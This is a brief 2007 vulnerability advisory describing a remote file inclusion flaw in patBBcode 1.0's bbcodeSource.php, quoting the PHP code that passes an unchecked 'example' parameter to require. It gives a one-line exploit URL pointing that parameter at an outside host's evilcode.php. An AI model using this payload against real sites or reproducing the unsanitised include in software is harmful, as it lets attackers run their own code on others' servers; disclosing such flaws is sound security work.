patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability

2007-11-12 00:00:00

Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examples\patExampleGen\bbcodeSource.php

Vuln code:
if( !isset( $_GET['example'] ) )
die( 'No example selected.' );

$exampleId = $_GET['example'];

ob_start();

// make the example think it's still in the right place
chdir( '../' );

// include the example
require $exampleId.'.php';

ob_end_clean();

Exploit:
examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php

#

Fixes

No fixes

In order to submit a new fix you need to be registered.